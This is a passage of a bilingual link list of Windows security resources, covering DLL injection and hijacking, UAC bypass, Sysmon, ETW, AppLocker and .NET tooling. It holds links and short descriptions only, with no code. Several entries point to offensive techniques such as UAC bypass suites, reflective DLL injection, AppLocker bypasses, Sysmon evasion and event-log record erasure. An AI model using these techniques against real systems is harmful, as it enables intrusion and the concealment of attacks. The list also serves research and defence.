- 2019.03 [hexacorn] [Extracting and Parsing PE signatures en masse](http://www.hexacorn.com/blog/2019/03/03/extracting-and-parsing-pe-signatures-en-masse/)
- 2019.02 [hexacorn] [PE files and the Easy Programming Language (EPL)](http://www.hexacorn.com/blog/2019/02/13/pe-files-and-the-easy-programming-language-epl/)
- 2019.01 [pediy] [[原创]PE加载器的简单实现](https://bbs.pediy.com/thread-249133.htm)
***
## <a id="89f963773ee87e2af6f9170ee60a7fb2"></a>DLL
### <a id="4dcfd9135aa5321b7fa65a88155256f9"></a>新添加
#### <a id="9753a9d52e19c69dc119bf03e9d7c3d2"></a>工具
- [**1915**星][22d] [C#] [lucasg/dependencies](https://github.com/lucasg/dependencies) A rewrite of the old legacy software "depends.exe" in C# for Windows devs to troubleshoot dll load dependencies issues.
- [**1333**星][10m] [C] [fancycode/memorymodule](https://github.com/fancycode/memorymodule) Library to load a DLL from memory.
- [**1146**星][27d] [C#] [perfare/il2cppdumper](https://github.com/perfare/il2cppdumper) Restore dll from Unity il2cpp binary file (except code)
- [**793**星][11m] [C#] [terminals-origin/terminals](https://github.com/terminals-origin/terminals) Terminals is a secure, multi tab terminal services/remote desktop client. It uses Terminal Services ActiveX Client (mstscax.dll). The project started from the need of controlling multiple connections simultaneously. It is a complete replacement for the mstsc.exe (Terminal Services) client. This is official source moved from Codeplex.
- [**388**星][7m] [C++] [hasherezade/dll_to_exe](https://github.com/hasherezade/dll_to_exe) Converts a DLL into EXE
- [**363**星][19d] [C#] [3f/dllexport](https://github.com/3f/dllexport) .NET DllExport
- [**240**星][10m] [C++] [wbenny/detoursnt](https://github.com/wbenny/detoursnt) Detours with just single dependency - NTDLL
- [**230**星][1y] [C#] [misaka-mikoto-tech/monohooker](https://github.com/Misaka-Mikoto-Tech/MonoHooker) hook C# method at runtime without modify dll file (such as UnityEditor.dll)
- [**215**星][6m] [C#] [erfg12/memory.dll](https://github.com/erfg12/memory.dll) C# Hacking library for making PC game trainers.
- [**214**星][26d] [C++] [chuyu-team/mint](https://github.com/Chuyu-Team/MINT) Contains the definitions for the Windows Internal UserMode API from ntdll.dll, samlib.dll and winsta.dll.
#### <a id="b05f4c5cdfe64e1dde2a3c8556e85827"></a>文章
- 2019.12 [freebuf] [如何使用ADSI接口和反射型DLL枚举活动目录](https://www.freebuf.com/articles/system/218855.html)
- 2019.11 [tyranidslair] [The Internals of AppLocker - Part 4 - Blocking DLL Loading](https://tyranidslair.blogspot.com/2019/11/the-internals-of-applocker-part-4.html)
- 2019.09 [hexacorn] [RunDll32 — API calling](http://www.hexacorn.com/blog/2019/09/28/rundll32-api-calling/)
- 2019.09 [4hou] [《MiniDumpWriteDump via COM+ Services DLL》的利用测试](https://www.4hou.com/technology/20146.html)
- 2019.08 [osandamalith] [Converting an EXE to a DLL](https://osandamalith.com/2019/08/26/converting-an-exe-to-a-dll/)
- 2019.06 [4hou] [域渗透——利用dnscmd在DNS服务器上实现远程加载Dll](https://www.4hou.com/penetration/18447.html)
- 2019.06 [hexacorn] [Playing with Delay-Loaded DLLs…](http://www.hexacorn.com/blog/2019/06/03/playing-with-delay-loaded-dlls/)
- 2019.05 [3gstudent] [域渗透——利用dnscmd在DNS服务器上实现远程加载Dll](https://3gstudent.github.io/3gstudent.github.io/%E5%9F%9F%E6%B8%97%E9%80%8F-%E5%88%A9%E7%94%A8dnscmd%E5%9C%A8DNS%E6%9C%8D%E5%8A%A1%E5%99%A8%E4%B8%8A%E5%AE%9E%E7%8E%B0%E8%BF%9C%E7%A8%8B%E5%8A%A0%E8%BD%BDDll/)
- 2019.05 [3gstudent] [域渗透——利用dnscmd在DNS服务器上实现远程加载Dll](https://3gstudent.github.io/3gstudent.github.io/%E5%9F%9F%E6%B8%97%E9%80%8F-%E5%88%A9%E7%94%A8dnscmd%E5%9C%A8DNS%E6%9C%8D%E5%8A%A1%E5%99%A8%E4%B8%8A%E5%AE%9E%E7%8E%B0%E8%BF%9C%E7%A8%8B%E5%8A%A0%E8%BD%BDDll/)
- 2019.05 [4sysops] [PS Protector: Convert your PowerShell module into a .NET assembly DLL](https://4sysops.com/archives/ps-protector-convert-your-powershell-module-into-a-net-assembly-dll/)
- 2019.05 [0x00sec] [Malicious DLL execution using Apple's APSDaemon.exe signed binary](https://0x00sec.org/t/malicious-dll-execution-using-apples-apsdaemon-exe-signed-binary/13409/)
- 2019.04 [4hou] [Qt5漏洞导致Cisco WebEx和Malwarebytes反病毒产品可远程加载任意DLL](https://www.4hou.com/vulnerable/17257.html)
- 2019.04 [id] [DLL CryptoMix](http://id-ransomware.blogspot.com/2019/04/dll-cryptomix-ransomware.html)
- 2019.03 [CyborgElf] [How To Make an Internal DLL Game Hack C++ (Rainbow Six Siege)](https://www.youtube.com/watch?v=wrIPVBXXisc)
- 2019.02 [] [No Source Code For a 14-Year Old Vulnerable DLL? No Problem. (CVE-2018-20250)](https://blog.0patch.com/2019/02/no-source-code-for-14-year-old.html)
- 2018.12 [srcincite] [思科Webex桌面会议App提权漏洞, 可导致RCE](https://srcincite.io/blog/2018/12/03/webexec-reloaded-cisco-webex-meetings-desktop-app-lpe.html)
### <a id="3b4617e54405a32290224b729ff9f2b3"></a>DLL注入
#### <a id="b0d50ee42d53b1f88b32988d34787137"></a>工具
- [**713**星][5m] [C++] [darthton/xenos](https://github.com/darthton/xenos) Windows DLL 注入器
- [**588**星][2m] [PS] [monoxgas/srdi](https://github.com/monoxgas/srdi) Shellcode implementation of Reflective DLL Injection. Convert DLLs to position independent shellcode
#### <a id="1a0b0dab4cdbab08bbdc759bab70dbb6"></a>文章
- 2019.12 [freebuf] [如何防止恶意的第三方DLL注入到进程](https://www.freebuf.com/articles/system/219198.html)
- 2019.06 [aliyun] [Windows 10 Task Scheduler服务DLL注入漏洞分析](https://xz.aliyun.com/t/5286)
- 2018.10 [pediy] [[原创]代替创建用户线程使用ShellCode注入DLL的小技巧](https://bbs.pediy.com/thread-247515.htm)
- 2018.10 [4hou] [如何利用DLL注入绕过Win10勒索软件保护](http://www.4hou.com/technology/13923.html)
- 2018.10 [0x00sec] [Reflective Dll Injection - Any Way to check If a process is already injected?](https://0x00sec.org/t/reflective-dll-injection-any-way-to-check-if-a-process-is-already-injected/8980/)
- 2018.09 [pediy] [[原创]win10_arm64 驱动注入dll 到 arm32程序](https://bbs.pediy.com/thread-247032.htm)
- 2018.08 [freebuf] [sRDI:一款通过Shellcode实现反射型DLL注入的强大工具](http://www.freebuf.com/sectool/181426.html)
- 2018.07 [4hou] [注入系列——DLL注入](http://www.4hou.com/technology/12703.html)
- 2018.06 [0x00sec] [Reflective DLL Injection - AV detects at runtime](https://0x00sec.org/t/reflective-dll-injection-av-detects-at-runtime/7307/)
- 2018.06 [qq] [【游戏漏洞】注入DLL显示游戏窗口](http://gslab.qq.com/article-508-1.html)
- 2017.12 [secist] [Mavinject | Dll Injected](http://www.secist.com/archives/5912.html)
- 2017.12 [secvul] [SSM终结dll注入](https://secvul.com/topics/951.html)
- 2017.10 [nsfocus] [【干货分享】Sandbox技术之DLL注入](http://blog.nsfocus.net/sandbox-technology-dll-injection/)
- 2017.10 [freebuf] [DLL注入新姿势:反射式DLL注入研究](http://www.freebuf.com/articles/system/151161.html)
- 2017.10 [pediy] [[原创]通过Wannacry分析内核shellcode注入dll技术](https://bbs.pediy.com/thread-221756.htm)
- 2017.09 [360] [Dll注入新姿势:SetThreadContext注入](https://www.anquanke.com/post/id/86786/)
- 2017.08 [silentbreaksecurity] [sRDI – Shellcode Reflective DLL Injection](https://silentbreaksecurity.com/srdi-shellcode-reflective-dll-injection/)
- 2017.08 [360] [DLL注入那些事](https://www.anquanke.com/post/id/86671/)
- 2017.08 [freebuf] [系统安全攻防战:DLL注入技术详解](http://www.freebuf.com/articles/system/143640.html)
- 2017.08 [pediy] [[翻译]多种DLL注入技术原理介绍](https://bbs.pediy.com/thread-220405.htm)
### <a id="f39e40e340f61ae168b67424baac5cc6"></a>DLL劫持
#### <a id="c9cdcc6f4acbeda6c8ac8f4a1ba1ea6b"></a>工具
- [**431**星][7m] [Pascal] [mojtabatajik/robber](https://github.com/mojtabatajik/robber) 查找易于发生DLL劫持的可执行文件
- [**299**星][11m] [C++] [anhkgg/superdllhijack](https://github.com/anhkgg/superdllhijack) 一种通用Dll劫持技术,不再需要手工导出Dll的函数接口了
#### <a id="01e95333e07439ac8326253aa8950b4f"></a>文章
- 2019.06 [4hou] [戴尔预装的SupportAssist组件存在DLL劫持漏洞,全球超过1亿台设备面临网络攻击风险](https://www.4hou.com/vulnerable/18764.html)
- 2019.05 [4hou] [《Lateral Movement — SCM and DLL Hijacking Primer》的利用扩展](https://www.4hou.com/technology/18008.html)
- 2019.04 [3gstudent] [《Lateral Movement — SCM and DLL Hijacking Primer》的利用扩展](https://3gstudent.github.io/3gstudent.github.io/Lateral-Movement-SCM-and-DLL-Hijacking-Primer-%E7%9A%84%E5%88%A9%E7%94%A8%E6%89%A9%E5%B1%95/)
- 2019.04 [3gstudent] [《Lateral Movement — SCM and DLL Hijacking Primer》的利用扩展](https://3gstudent.github.io/3gstudent.github.io/Lateral-Movement-SCM-and-DLL-Hijacking-Primer-%E7%9A%84%E5%88%A9%E7%94%A8%E6%89%A9%E5%B1%95/)
- 2019.04 [specterops] [Lateral Movement — SCM and Dll Hijacking Primer](https://medium.com/p/d2f61e8ab992)
- 2019.01 [sans] [DLL Hijacking Like a Boss!](https://www.sans.org/cyber-security-summit/archives/file/summit_archive_1493862085.pdf)
- 2018.11 [t00ls] [一种通用DLL劫持技术研究](https://www.t00ls.net/articles-48756.html)
- 2018.11 [pediy] [[原创]一种通用DLL劫持技术研究](https://bbs.pediy.com/thread-248050.htm)
- 2018.09 [DoktorCranium] [Understanding how DLL Hijacking works](https://www.youtube.com/watch?v=XADSrZEJdXY)
- 2018.09 [astr0baby] [Understanding how DLL Hijacking works](https://astr0baby.wordpress.com/2018/09/08/understanding-how-dll-hijacking-works/)
- 2018.08 [parsiya] [DVTA - Part 5 - Client-side Storage and DLL Hijacking](https://parsiya.net/blog/2018-08-25-dvta-part-5-client-side-storage-and-dll-hijacking/)
- 2018.08 [parsiya] [DVTA - Part 5 - Client-side Storage and DLL Hijacking](https://parsiya.net/blog/2018-08-25-dvta---part-5---client-side-storage-and-dll-hijacking/)
- 2018.06 [cybereason] [Attackers incriminate a signed Oracle process for DLL hijacking, running Mimikatz](https://www.cybereason.com/blog/oracle-mimikatz-dll-hijacking)
- 2018.05 [360] [独辟蹊径:如何通过URL文件实现DLL劫持](https://www.anquanke.com/post/id/145715/)
- 2018.05 [insert] [利用URL文件实现DLL劫持](https://insert-script.blogspot.com/2018/05/dll-hijacking-via-url-files.html)
- 2017.10 [cybereason] [Siofra, a free tool built by Cybereason researcher, exposes DLL hijacking vulnerabilities in Windows programs](https://www.cybereason.com/blog/blog-siofra-free-tool-exposes-dll-hijacking-vulnerabilities-in-windows)
- 2017.08 [securiteam] [SSD Advisory – Dashlane DLL Hijacking](https://blogs.securiteam.com/index.php/archives/3357)
- 2017.05 [4hou] [Windows 下的 7 种 DLL 劫持技术](http://www.4hou.com/technology/4945.html)
- 2017.05 [pediy] [[原创]让代码飞出一段钢琴曲(freepiano小助手)(全局键盘钩子+dll劫持)+有码](https://bbs.pediy.com/thread-217330.htm)
- 2017.03 [pentestlab] [DLL Hijacking](https://pentestlab.blog/2017/03/27/dll-hijacking/)
***
## <a id="40fd1488e4a26ebf908f44fdcedd9675"></a>UAC
### <a id="02517eda8c2519c564a19219e97d6237"></a>工具
- [**2355**星][11d] [C] [hfiref0x/uacme](https://github.com/hfiref0x/uacme) Defeating Windows User Account Control
- [**2307**星][1m] [PS] [k8gege/k8tools](https://github.com/k8gege/k8tools) K8工具合集(内网渗透/提权工具/远程溢出/漏洞利用/扫描工具/密码破解/免杀工具/Exploit/APT/0day/Shellcode/Payload/priviledge/BypassUAC/OverFlow/WebShell/PenTest) Web GetShell Exploit(Struts2/Zimbra/Weblogic/Tomcat/Apache/Jboss/DotNetNuke/zabbix)
- [**1688**星][3m] [Py] [rootm0s/winpwnage](https://github.com/rootm0s/winpwnage) UAC bypass, Elevate, Persistence and Execution methods
### <a id="90d7d5feb7fd506dc8fd6ee0d7e98285"></a>文章
- 2019.11 [4hou] [CVE-2019-1388: Windows UAC权限提升漏洞](https://www.4hou.com/info/news/21710.html)
- 2019.10 [freebuf] [UAC绕过初探](https://www.freebuf.com/articles/system/216337.html)
- 2019.09 [4sysops] [Security options in Windows Server 2016: Accounts and UAC](https://4sysops.com/archives/security-options-in-windows-server-2016-accounts-and-uac/)
- 2019.08 [freebuf] [SneakyEXE:一款嵌入式UAC绕过工具](https://www.freebuf.com/sectool/209097.html)
- 2019.04 [markmotig] [Brute Forcing Admin Passwords with UAC](https://medium.com/p/e711c551ad7e)
- 2019.03 [4hou] [通过模拟可信目录绕过UAC的利用分析](https://www.4hou.com/technology/16713.html)
- 2019.03 [aliyun] [如何滥用Access Tokens UIAccess绕过UAC](https://xz.aliyun.com/t/4126)
- 2019.02 [3gstudent] [通过模拟可信目录绕过UAC的利用分析](https://3gstudent.github.io/3gstudent.github.io/%E9%80%9A%E8%BF%87%E6%A8%A1%E6%8B%9F%E5%8F%AF%E4%BF%A1%E7%9B%AE%E5%BD%95%E7%BB%95%E8%BF%87UAC%E7%9A%84%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90/)
- 2019.02 [3gstudent] [通过模拟可信目录绕过UAC的利用分析](https://3gstudent.github.io/3gstudent.github.io/%E9%80%9A%E8%BF%87%E6%A8%A1%E6%8B%9F%E5%8F%AF%E4%BF%A1%E7%9B%AE%E5%BD%95%E7%BB%95%E8%BF%87UAC%E7%9A%84%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90/)
- 2019.02 [sans] [UAC is not all that bad really](https://isc.sans.edu/forums/diary/UAC+is+not+all+that+bad+really/24620/)
- 2019.01 [fuzzysecurity] [Anatomy of UAC Attacks](http://fuzzysecurity.com/tutorials/27.html)
- 2019.01 [sevagas] [Yet another sdclt UAC bypass](https://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass)
- 2018.11 [4hou] [利用metasploit绕过UAC的5种方式](http://www.4hou.com/system/13707.html)
- 2018.11 [tenable] [UAC Bypass by Mocking Trusted Directories](https://medium.com/p/24a96675f6e)
- 2018.10 [0x000x00] [How to bypass UAC in newer Windows versions](https://0x00-0x00.github.io/research/2018/10/31/How-to-bypass-UAC-in-newer-Windows-versions.html)
- 2018.10 [tyranidslair] [Farewell to the Token Stealing UAC Bypass](https://tyranidslair.blogspot.com/2018/10/farewell-to-token-stealing-uac-bypass.html)
- 2018.10 [freebuf] [使用Metasploit绕过UAC的多种方法](http://www.freebuf.com/articles/system/185311.html)
- 2018.09 [freebuf] [一种绕过UAC的技术介绍](http://www.freebuf.com/articles/system/184140.html)
- 2018.09 [hackingarticles] [Multiple Ways to Bypass UAC using Metasploit](http://www.hackingarticles.in/multiple-ways-to-bypass-uac-using-metasploit/)
- 2018.09 [hexacorn] [A bit of a qUACkery – how to elevate… w/o doing a single thing ;)](http://www.hexacorn.com/blog/2018/09/07/a-bit-of-a-quackery-how-to-elevate-w-o-doing-a-single-thing/)
***
## <a id="0fed6a96b28f339611e7b111b8f42c23"></a>Sysmon
### <a id="d48f038b58dc921660be221b4e302f70"></a>工具
- [**206**星][1y] [JS] [jpcertcc/sysmonsearch](https://github.com/jpcertcc/sysmonsearch) Investigate suspicious activity by visualizing Sysmon's event log
### <a id="2c8cb7fdf765b9d930569f7c64042d62"></a>文章
- 2019.12 [vanimpe] [Use Sysmon DNS data for incident response](https://www.vanimpe.eu/2019/12/02/use-sysmon-dns-data-for-incident-response/)
- 2019.11 [4hou] [你不知道的威胁狩猎技巧:Windows API 与 Sysmon 事件的映射](https://www.4hou.com/system/21461.html)
- 2019.10 [HackersOnBoard] [Subverting Sysmon Application of a Formalized Security Product Evasion Methodology](https://www.youtube.com/watch?v=7eor4Gq1YXE)
- 2019.09 [sans] [Parsing Sysmon Events for IR Indicators](https://digital-forensics.sans.org/blog/2019/09/25/parsing-sysmon-events-for-ir-indicators)
- 2019.09 [blackhillsinfosec] [Getting Started With Sysmon](https://www.blackhillsinfosec.com/getting-started-with-sysmon/)
- 2019.09 [osandamalith] [Unloading the Sysmon Minifilter Driver](https://osandamalith.com/2019/09/22/unloading-the-sysmon-minifilter-driver/)
- 2019.09 [specterops] [Shhmon — Silencing Sysmon via Driver Unload](https://medium.com/p/682b5be57650)
- 2019.09 [4hou] [如何逃逸Sysmon工具对DNS的监控](https://www.4hou.com/web/18660.html)
- 2019.09 [olafhartong] [Sysmon 10.4 release](https://medium.com/p/7f7480300dff)
- 2019.09 [blackhillsinfosec] [Webcast: Windows logging, Sysmon, and ELK](https://www.blackhillsinfosec.com/webcast-windows-logging-sysmon-and-elk/)
- 2019.08 [blackhillsinfosec] [Webcast: Implementing Sysmon and Applocker](https://www.blackhillsinfosec.com/webcast-implementing-sysmon-and-applocker/)
- 2019.07 [eforensicsmag] [Using Sysmon and ETW For So Much More | By David Kennedy](https://eforensicsmag.com/using-sysmon-and-etw-for-so-much-more-by-david-kennedy/)
- 2019.06 [nosecurecode] [Sysmon in a Box](https://nosecurecode.com/2019/06/29/sysmon-in-a-box/)
- 2019.06 [binarydefense] [Using Sysmon and ETW For So Much More - Binary Defense](https://www.binarydefense.com/using-sysmon-and-etw-for-so-much-more/)
- 2019.06 [360] [如何规避Sysmon DNS监控](https://www.anquanke.com/post/id/180418/)
- 2019.06 [SecurityWeekly] [Sysmon DNS Logging, Gravwell - PSW #608](https://www.youtube.com/watch?v=e_E6F1G6b88)
- 2019.06 [xpnsec] [Evading Sysmon DNS Monitoring](https://blog.xpnsec.com/evading-sysmon-dns-monitoring/)
- 2019.06 [olafhartong] [Using Sysmon in Azure Sentinel](https://medium.com/p/883eb6ffc431)
- 2019.05 [olafhartong] [Sysmon 10.0 - New features and changes](https://medium.com/p/e82106f2e00)
- 2019.02 [specterops] [Putting Sysmon v9.0 AND/OR Grouping Logic to the Test](https://medium.com/p/c3ec27263df8)
***
## <a id="ac43a3ce5a889d8b18cf22acb6c31a72"></a>ETW
### <a id="0af4bd8ca0fd27c9381a2d1fa8b71a1f"></a>工具
- [**1228**星][10d] [JS] [jpcertcc/logontracer](https://github.com/jpcertcc/logontracer) 通过可视化和分析Windows事件日志来调查恶意的Windows登录
- [**865**星][22d] [C++] [google/uiforetw](https://github.com/google/uiforetw) User interface for recording and managing ETW traces
- [**654**星][10m] [Roff] [palantir/windows-event-forwarding](https://github.com/palantir/windows-event-forwarding) 使用 Windows 事件转发实现网络事件监测和防御
- [**609**星][19d] [PS] [sbousseaden/evtx-attack-samples](https://github.com/sbousseaden/evtx-attack-samples) 与特定攻击和利用后渗透技术相关的Windows事件样例
- [**504**星][10m] [C#] [lowleveldesign/wtrace](https://github.com/lowleveldesign/wtrace) Command line tracing tool for Windows, based on ETW.
- [**479**星][5m] [PS] [sans-blue-team/deepbluecli](https://github.com/sans-blue-team/deepbluecli) a PowerShell Module for Threat Hunting via Windows Event Logs
- [**446**星][9m] [PS] [nsacyber/event-forwarding-guidance](https://github.com/nsacyber/Event-Forwarding-Guidance) 帮助管理员使用Windows事件转发(WEF)收集与安全相关的Windows事件日志
- [**393**星][10m] [Py] [williballenthin/python-evtx](https://github.com/williballenthin/python-evtx) 纯Python编写的Windows事件日志解析器
- [**341**星][1y] [C++] [qax-a-team/eventcleaner](https://github.com/QAX-A-Team/EventCleaner) A tool mainly to erase specified records from Windows event logs, with additional functionalities.
- [**306**星][1m] [C#] [zodiacon/procmonx](https://github.com/zodiacon/procmonx) 通过Windows事件日志获取与Process Monitor显示的相同的信息,无需内核驱动
- [**282**星][3m] [C#] [fireeye/silketw](https://github.com/fireeye/silketw) flexible C# wrappers for ETW
- [**282**星][10m] [C#] [nsacyber/windows-event-log-messages](https://github.com/nsacyber/Windows-Event-Log-Messages) 检索Windows二进制文件中嵌入的Windows事件日志消息的定义,并以discoverable的格式提供它们
- [**261**星][3m] [C++] [gametechdev/presentmon](https://github.com/gametechdev/presentmon) Tool for collection and processing of ETW events related to DXGI presentation.
- [**249**星][3m] [C++] [microsoft/krabsetw](https://github.com/microsoft/krabsetw) KrabsETW provides a modern C++ wrapper and a .NET wrapper around the low-level ETW trace consumption functions.
### <a id="11c4c804569626c1eb02140ba557bb85"></a>文章
- 2019.12 [Cooper] [EventList, Matching Windows Event Log IDs With MITRE ATT&CK - Miriam Wiesner](https://www.youtube.com/watch?v=l5PpbOmopyA)
- 2019.09 [adventuresincyberchallenges] [Powershell Encoded Payload In Clear Text in Windows Event Log 4688](https://adventuresincyberchallenges.blogspot.com/2019/09/powershell-encoded-payload-in-clear.html)
- 2019.09 [Cyb3rWard0g] [Threat Hunting with ETW events and HELK — Part 2: Shipping ETW events to HELK ⚒](https://medium.com/p/16837116d2f5)
- 2019.09 [Cyb3rWard0g] [Threat Hunting with ETW events and HELK — Part 1: Installing SilkETW 🏄♀🏄](https://medium.com/p/6eb74815e4a0)
- 2019.05 [freebuf] [SilkETW:一款针对Windows事件追踪的自定义C#封装工具](https://www.freebuf.com/sectool/203531.html)
- 2019.04 [4sysops] [Forward Windows events to a Syslog server with free SolarWinds Event Log Forwarder for Windows](https://4sysops.com/archives/forward-windows-events-to-a-syslog-server-with-free-solarwinds-event-log-forwarder-for-windows/)
- 2019.02 [360] [ETW注册表监控windows内核实现原理](https://www.anquanke.com/post/id/171298/)
- 2019.01 [sans] [Rocking Your Windows EventID with ELK Stack](https://www.sans.org/cyber-security-summit/archives/file/summit_archive_1492181323.pdf)
- 2019.01 [sans] [Threat Hunting via Windows Event Logs](https://www.sans.org/cyber-security-summit/archives/file/summit_archive_1524493093.pdf)
- 2019.01 [sans] [Hunting for Lateral Movement Using Windows Event Log](https://www.sans.org/cyber-security-summit/archives/file/summit_archive_1536265369.pdf)
- 2018.12 [palantir] [Tampering with Windows Event Tracing: Background, Offense, and Defense](https://medium.com/p/4be7ac62ac63)
- 2018.12 [sophos] [Hunting for threats with Intercept X and the Windows Event Collector](https://news.sophos.com/en-us/2018/12/03/hunting-for-threats-with-intercept-x-and-the-windows-event-collector/)
- 2018.08 [4sysops] [Query multiple Windows event logs with PowerShell](https://4sysops.com/archives/query-multiple-windows-event-logs-with-powershell/)
- 2018.07 [criteo] [Grab ETW Session, Providers and Events](http://labs.criteo.com/2018/07/grab-etw-session-providers-and-events/)
- 2018.07 [3gstudent] [Windows Event Viewer Log (EVT)单条日志清除(三)——删除当前系统指定指定时间段evt日志记录](https://3gstudent.github.io/3gstudent.github.io/Windows-Event-Viewer-Log-(EVT)%E5%8D%95%E6%9D%A1%E6%97%A5%E5%BF%97%E6%B8%85%E9%99%A4-%E4%B8%89-%E5%88%A0%E9%99%A4%E5%BD%93%E5%89%8D%E7%B3%BB%E7%BB%9F%E6%8C%87%E5%AE%9A%E6%8C%87%E5%AE%9A%E6%97%B6%E9%97%B4%E6%AE%B5evt%E6%97%A5%E5%BF%97%E8%AE%B0%E5%BD%95/)
- 2018.07 [3gstudent] [Windows Event Viewer Log (EVT)单条日志清除(三)——删除当前系统指定指定时间段evt日志记录](https://3gstudent.github.io/3gstudent.github.io/Windows-Event-Viewer-Log-(EVT)%E5%8D%95%E6%9D%A1%E6%97%A5%E5%BF%97%E6%B8%85%E9%99%A4-%E4%B8%89-%E5%88%A0%E9%99%A4%E5%BD%93%E5%89%8D%E7%B3%BB%E7%BB%9F%E6%8C%87%E5%AE%9A%E6%8C%87%E5%AE%9A%E6%97%B6%E9%97%B4%E6%AE%B5evt%E6%97%A5%E5%BF%97%E8%AE%B0%E5%BD%95/)
- 2018.07 [pentesttoolz] [LogonTracer – Investigate Malicious Windows Logon By Visualizing And Analyzing Windows Event Log](https://pentesttoolz.com/2018/07/17/logontracer-investigate-malicious-windows-logon-by-visualizing-and-analyzing-windows-event-log/)
- 2018.07 [dragos] [EvtxToElk: A Python Module to Load Windows Event Logs into ElasticSearch](https://dragos.com/blog/20180717EvtxToElk.html)
- 2018.07 [3gstudent] [Windows Event Viewer Log (EVT)单条日志清除(二)——程序实现删除evt文件指定时间段的日志记录](https://3gstudent.github.io/3gstudent.github.io/Windows-Event-Viewer-Log-(EVT)%E5%8D%95%E6%9D%A1%E6%97%A5%E5%BF%97%E6%B8%85%E9%99%A4-%E4%BA%8C-%E7%A8%8B%E5%BA%8F%E5%AE%9E%E7%8E%B0%E5%88%A0%E9%99%A4evt%E6%96%87%E4%BB%B6%E6%8C%87%E5%AE%9A%E6%97%B6%E9%97%B4%E6%AE%B5%E7%9A%84%E6%97%A5%E5%BF%97%E8%AE%B0%E5%BD%95/)
- 2018.07 [3gstudent] [Windows Event Viewer Log (EVT)单条日志清除(二)——程序实现删除evt文件指定时间段的日志记录](https://3gstudent.github.io/3gstudent.github.io/Windows-Event-Viewer-Log-(EVT)%E5%8D%95%E6%9D%A1%E6%97%A5%E5%BF%97%E6%B8%85%E9%99%A4-%E4%BA%8C-%E7%A8%8B%E5%BA%8F%E5%AE%9E%E7%8E%B0%E5%88%A0%E9%99%A4evt%E6%96%87%E4%BB%B6%E6%8C%87%E5%AE%9A%E6%97%B6%E9%97%B4%E6%AE%B5%E7%9A%84%E6%97%A5%E5%BF%97%E8%AE%B0%E5%BD%95/)
***
## <a id="184bbacd8b9e08c30cc9ffcee9513f44"></a>AppLocker
### <a id="8f1876dff78e80b60d00de25994276d9"></a>工具
- [**921**星][7m] [PS] [api0cradle/ultimateapplockerbypasslist](https://github.com/api0cradle/ultimateapplockerbypasslist) The goal of this repository is to document the most common techniques to bypass AppLocker.
### <a id="286317d6d7c1a0578d8f5db940201320"></a>文章
- 2019.11 [tyranidslair] [The Internals of AppLocker - Part 3 - Access Tokens and Access Checking](https://tyranidslair.blogspot.com/2019/11/the-internals-of-applocker-part-3.html)
- 2019.11 [tyranidslair] [The Internals of AppLocker - Part 2 - Blocking Process Creation](https://tyranidslair.blogspot.com/2019/11/the-internals-of-applocker-part-2.html)
- 2019.11 [tyranidslair] [The Internals of AppLocker - Part 1 - Overview and Setup](https://tyranidslair.blogspot.com/2019/11/the-internals-of-applocker-part-1.html)
- 2019.09 [blackhillsinfosec] [Getting Started With AppLocker](https://www.blackhillsinfosec.com/getting-started-with-applocker/)
- 2019.08 [p0w3rsh3ll] [How to delete a single Applocker rule](https://p0w3rsh3ll.wordpress.com/2019/08/02/how-to-delete-a-single-applocker-rule/)
- 2019.05 [oddvar] [A small discovery about AppLocker](https://oddvar.moe/2019/05/29/a-small-discovery-about-applocker/)
- 2019.04 [4hou] [通过regsrv32.exe绕过Applocker应用程序白名单的多种方法](https://www.4hou.com/web/17354.html)
- 2019.03 [4sysops] [Application whitelisting: Software Restriction Policies vs. AppLocker vs. Windows Defender Application Control](https://4sysops.com/archives/application-whitelisting-software-restriction-policies-vs-applocker-vs-windows-defender-application-control/)
- 2019.03 [4hou] [逃避手段再开花——从一个能逃避AppLocker和AMSI检测的Office文档讲起](https://www.4hou.com/system/16916.html)
- 2019.03 [yoroi] [The Document that Eluded AppLocker and AMSI](https://blog.yoroi.company/research/the-document-that-eluded-applocker-and-amsi/)
- 2019.03 [p0w3rsh3ll] [Applocker and PowerShell: how do they tightly work together?](https://p0w3rsh3ll.wordpress.com/2019/03/07/applocker-and-powershell-how-do-they-tightly-work-together/)
- 2019.02 [4hou] [如何以管理员身份绕过AppLocker](http://www.4hou.com/web/16213.html)
- 2019.02 [oddvar] [Bypassing AppLocker as an admin](https://oddvar.moe/2019/02/01/bypassing-applocker-as-an-admin/)
- 2019.01 [hackingarticles] [Windows Applocker Policy – A Beginner’s Guide](https://www.hackingarticles.in/windows-applocker-policy-a-beginners-guide/)
- 2019.01 [t00ls] [投稿文章:Bypass Applocker + 免杀执行任意 shellcode [ csc + installUtil ]](https://www.t00ls.net/articles-49443.html)
- 2018.12 [hecfblog] [Daily Blog #580: Applocker and Windows 10](https://www.hecfblog.com/2018/12/daily-blog-580-applocker-and-windows-10.html)
- 2018.12 [hecfblog] [Daily Blog #581: Forensic Lunch Test Kitchen 12/28/18 Syscache Applocker and Server 2012](https://www.hecfblog.com/2018/12/daily-blog-581-forensic-lunch-test.html)
- 2018.12 [360] [多维度对抗Windows AppLocker](https://www.anquanke.com/post/id/168633/)
- 2018.12 [tsscyber] [BloodHound.xpab — Applocker bypass](https://medium.com/p/895377ffa98e)
- 2018.10 [tsscyber] [AppLocker Bypass — presentationhost.exe](https://medium.com/p/8c87b2354cd4)
***
## <a id="b478e9a9a324c963da11437d18f04998"></a>工具
### <a id="f9fad1d4d1f0e871a174f67f63f319d8"></a>新添加的
### <a id="518d80dfb8e9dda028d18ace1d3f3981"></a>Procmon
### <a id="d90b60dc79837e06d8ba2a7ee1f109d3"></a>.NET
- [**12676**星][14d] [C#] [0xd4d/dnspy](https://github.com/0xd4d/dnspy) .NET debugger and assembly editor
- [**9261**星][11d] [C#] [icsharpcode/ilspy](https://github.com/icsharpcode/ilspy) .NET Decompiler
- [**3694**星][27d] [C#] [0xd4d/de4dot](https://github.com/0xd4d/de4dot) .NET deobfuscator and unpacker.
- [**3263**星][7m] [JS] [sindresorhus/speed-test](https://github.com/sindresorhus/speed-test) Test your internet connection speed and ping using speedtest.net from the CLI
- [**1657**星][14d] [C#] [jbevain/cecil](https://github.com/jbevain/cecil) C#库, 探查/修改/生成 .NET App/库
- [**217**星][11m] [C#] [rainwayapp/warden](https://github.com/rainwayapp/warden) Warden.NET is an easy to use process management library for keeping track of processes on Windows.
### <a id="6d2fe834b7662ecdd48c17163f732daf"></a>Environment&&环境&&配置
